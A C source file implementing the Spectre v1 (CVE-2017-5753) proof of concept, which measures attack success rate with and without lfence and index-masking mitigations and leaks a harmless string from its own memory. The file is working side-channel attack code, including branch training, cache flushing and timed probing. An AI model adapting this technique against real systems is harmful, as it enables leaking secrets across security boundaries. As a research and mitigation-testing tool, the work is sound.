/* spectre.c - CVE-2017-5753 user-to-user success rate measurement
 *
 * Borrows code from
 * - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
 * - https://github.com/genua/meltdown
 *
 * Copyright (c) 2022 Samuel AUBERTIN
 *
 * Permission to use, copy, modify, and distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
 * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
 * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
 * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */
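
/*
 * Build sketch (assumed invocation, not part of the original tree):
 *   cc spectre.c -o spectre                        # no mitigation
 *   cc -DLFENCE_MITIGATION spectre.c -o spectre    # lfence after the bounds check
 *   cc -DMASKING_MITIGATION spectre.c -o spectre   # index masking
 * NORDTSCP, NOMFENCE and NOCLFLUSH can also be defined to emulate CPUs
 * lacking those instructions.
 */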

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h> /* for rdtscp and clflush */

#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif

#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif

#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2

#ifndef NORDTSCP
#define LATENCY (42 + 42)
#else
#ifndef NOMFENCE
#define LATENCY (18 + 18)
#else
#define LATENCY 0 /* fallback so NOSSE2 builds (no rdtscp, no mfence) still compile */
#endif
#endif
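
/*
 * LATENCY is the assumed fixed cost of the timing sequence itself: it is
 * subtracted from every raw measurement in timed_access() and added back
 * onto the calibrated threshold in calibrate_threshold().
 */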

#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
 *
 * array_index_mask_nospec() - generate a mask that is ~0UL when the
 * bounds check succeeds and 0 otherwise
 * @index: array element index
 * @size: number of elements in array
 *
 * Returns:
 * 0 - (index < size)
 */
static inline unsigned long
array_index_mask_nospec(
    unsigned long index,
    unsigned long size
)
{
    unsigned long mask;
    __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
            :"=r" (mask)
            :"g"(size),"r" (index)
            :"cc");
    return mask;
}
#endif //MASKING_MITIGATION
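
/*
 * The mask is applied in victim_function() below:
 *     x &= array_index_mask_nospec(x, array1_size);
 * so a speculatively out-of-bounds index is masked to 0 before it is used
 * to index array1.
 */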

#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096

uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];

/* Flush memory using long SSE instructions */
void
flush_memory_sse(
    uint8_t * addr
)
{
    float * p = (float *)addr;
    float c = 0.f;
    __m128 i = _mm_setr_ps(c, c, c, c);

    int k, l;
    /* Non-sequential memory addressing by looping through k by l */
    for (k = 0; k < 4; k++)
        for (l = 0; l < 4; l++)
            _mm_stream_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH

char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";

unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
unsigned cache_hit_threshold;
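
/*
 * array2 is the probe array: one 512-byte-spaced slot per possible byte
 * value, so the cache line touched by victim_function() encodes array1[x].
 * The secret string lies at a fixed offset from array1, which is the
 * malicious_x that main() passes to leak().
 */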

static inline unsigned
timed_access(
    volatile uint8_t *addr
)
{
    uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
    unsigned int junk = junk;
#ifndef NORDTSCP
    t0 = __rdtscp(& junk);
    junk |= *addr;
    t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
    /*
    Since the rdtsc instruction isn't serialized, newer processors will try to
    reorder it, ruining its value as a timing mechanism.
    To get around this, we use the mfence instruction to introduce a memory
    barrier and force serialization. mfence is used because it is portable across
    Intel and AMD.
    */
    _mm_mfence();
    t0 = __rdtsc();
    _mm_mfence();
    junk = * addr;
    _mm_mfence();
    t1 = __rdtsc();
    _mm_mfence();
#else
    /*
    The mfence instruction was introduced with the SSE2 instruction set, so
    we have to ifdef it out on pre-SSE2 processors.
    Luckily, these older processors don't seem to reorder the rdtsc instruction,
    so not having mfence on older processors is less of an issue.
    */
    t0 = __rdtsc();
    junk |= *addr;
    t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
    return (unsigned)(t1 - t0 - LATENCY);
}

static void
calibrate_threshold(
    unsigned int *threshold
)
{
    volatile char buf[2 * CACHELINE_SIZE];
    volatile uint8_t *bufp;
    int i;
    const int cnt = 10000;
    uint64_t tcache = 0;
    __attribute__((unused))
    volatile int junk = 0;

    bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
        ~(CACHELINE_SIZE - 1)));

    junk |= *bufp;

    for (i = 0, tcache = 0; i < cnt; i++) {
        tcache += timed_access(bufp);
    }
    tcache = tcache / cnt;

    if (threshold != NULL) {
        *threshold = tcache + LATENCY;
    }
    return;
}
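
/*
 * calibrate_threshold() times repeated hits on a cache-resident buffer and
 * stores the average (plus LATENCY) as the detection threshold; main()
 * passes NULL to discard the result when a fixed threshold was supplied
 * with -t.
 */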

void
victim_function(
    size_t x
)
{
    if (x < array1_size) {
#ifdef LFENCE_MITIGATION
        /*
         * According to Intel et al, the best way to mitigate this is to
         * add a serializing instruction after the boundary check to force
         * the retirement of previous instructions before proceeding to
         * the read.
         * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
         */
        _mm_lfence();
#endif
#ifdef MASKING_MITIGATION
        x &= array_index_mask_nospec(x, array1_size);
#endif
        temp &= array2[array1[x] * 512];
    }
}
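
/*
 * victim_function() is the Spectre v1 gadget: while the branch on
 * array1_size is still being resolved, the CPU may speculatively read
 * array1[x] with an out-of-bounds x and touch array2[array1[x] * 512],
 * leaving a cache footprint that leak() recovers below by timing loads.
 */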

void
leak(
    size_t malicious_x,
    uint8_t value[2],
    int score[2],
    unsigned cache_hit_threshold
)
{
    static int results[256];
    int tries, i, j, mix_i;
    unsigned int junk = 0;
    size_t training_x, x;
    volatile uint8_t *addr;

#ifdef NOCLFLUSH
    int junk2 = 0;
    int l;
    (void)junk2;
#endif

    for (i = 0; i < 256; i++) {
        results[i] = 0;
    }

    for (tries = 999; tries > 0; tries--) {

#ifndef NOCLFLUSH
        /* Flush array2[512*(0..255)] from cache */
        for (i = 0; i < 256; i++)
            _mm_clflush(&array2[i * 512]);
#else
        /* Flush array2[512*(0..255)] from cache
           using long SSE instruction several times */
        for (j = 0; j < 16; j++) {
            for (i = 0; i < 256; i++) {
                flush_memory_sse( & array2[i * 512]);
            }
        }
#endif

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
#ifndef NOCLFLUSH
            _mm_clflush(&array1_size);
#else
            /* Alternative to using clflush to flush the CPU cache
             * Read addresses at 4096-byte intervals out of a large array.
             * Do this around 2000 times, or more depending on CPU cache size. */
            for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l -= CACHE_FLUSH_STRIDE) {
                junk2 = cache_flush_array[l];
            }
#endif
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));
            /* Call the victim! */
            victim_function(x);
        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255;
            addr = & array2[mix_i * 512];
            if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate the highest result's index in j */
        j = -1;
        for (i = 0; i < 256; i++) {
            if (j < 0 || results[i] >= results[j]) {
                j = i;
            }
        }
        if (results[j] >= 3)
            break;
    }

    results[0] ^= junk; /* use junk so code above won't get optimized out */
    value[0] = (uint8_t) j;
    score[0] = results[j];
}
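
/*
 * main() prints one colored character per recovered byte on stderr plus a
 * capability/mitigation summary line.  With -j it also emits JSON on stdout,
 * keyed by the program name and shaped roughly like (values illustrative):
 *   { "spectre": { "capacities": { "rdtscp": true, "mfence": true, "clflush": true },
 *                  "mitigations": { "lfence": false, "masking": false },
 *                  "threshold": 50, "success": 80 } }
 */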

int
main(
    int argc,
    char** argv
)
{
    int o;
    size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
    int i, score[2], len = (int)strlen(secret);
    uint8_t value[2];
    unsigned successes = 0;
    int json = 0;

    while ((o = getopt(argc, argv, "t:j")) != EOF) {
        switch (o) {
        case 't':
            cache_hit_threshold = atoi(optarg);
            break;
        case 'j':
            json++;
            break;
        default:
        usage:
            fprintf(stderr, "usage: %s [-j] "
                "[-t threshold]\n"
                "\t-j\t\tJSON output\n"
                "\t-t INT\t\tfixed threshold\n", argv[0]);
            return 1;
        }
    }
    if (argc != optind)
        goto usage;

    fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ",
        argv[0] + 2,
        (int)strlen(secret));

    calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);

#ifdef NOCLFLUSH
    for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
        cache_flush_array[i] = 1;
    }
#endif

    for (i = 0; i < (int)sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

    while (--len >= 0) {
        leak(malicious_x++, value, score, cache_hit_threshold);
        if (score[0] == 3 && value[0] > 31 && value[0] < 127) {
            successes++;
            fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
        } else {
            fprintf(stderr, "\033[31m?\033[0m");
        }
    }
    fprintf(stderr, "\n");
    if (json) {
        printf("{ \"%s\": { \"capacities\": { ", argv[0] + 2);
#ifndef NORDTSCP
        printf("\"rdtscp\": true, ");
#else
        printf("\"rdtscp\": false, ");
#endif
#ifndef NOMFENCE
        printf("\"mfence\": true, ");
#else
        printf("\"mfence\": false, ");
#endif
#ifndef NOCLFLUSH
        printf("\"clflush\": true ");
#else
        printf("\"clflush\": false ");
#endif
        printf("}, \"mitigations\": { ");
#ifdef LFENCE_MITIGATION
        printf("\"lfence\": true, ");
#else
        printf("\"lfence\": false, ");
#endif
#ifdef MASKING_MITIGATION
        printf("\"masking\": true ");
#else
        printf("\"masking\": false ");
#endif
        printf("}, ");
        printf("\"threshold\": %d, ", cache_hit_threshold);
        printf("\"success\": %.0f } }",
            100 * successes / (float)strlen(secret));
    }
    fprintf(stderr, "[+] %-27s\t", argv[0] + 2);
#ifndef NORDTSCP
    fprintf(stderr, "RDTSCP ");
#else
    fprintf(stderr, "RDTSC ");
#endif
#ifndef NOMFENCE
    fprintf(stderr, "MFENCE ");
#endif
#ifndef NOCLFLUSH
    fprintf(stderr, "CLFLUSH ");
#endif
#ifdef LFENCE_MITIGATION
    fprintf(stderr, "LFENCE_MITIGATION ");
#endif
#ifdef MASKING_MITIGATION
    fprintf(stderr, "MASKING_MITIGATION ");
#endif
    fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n",
        cache_hit_threshold,
        100 * successes / (float)strlen(secret));

    return 0;
}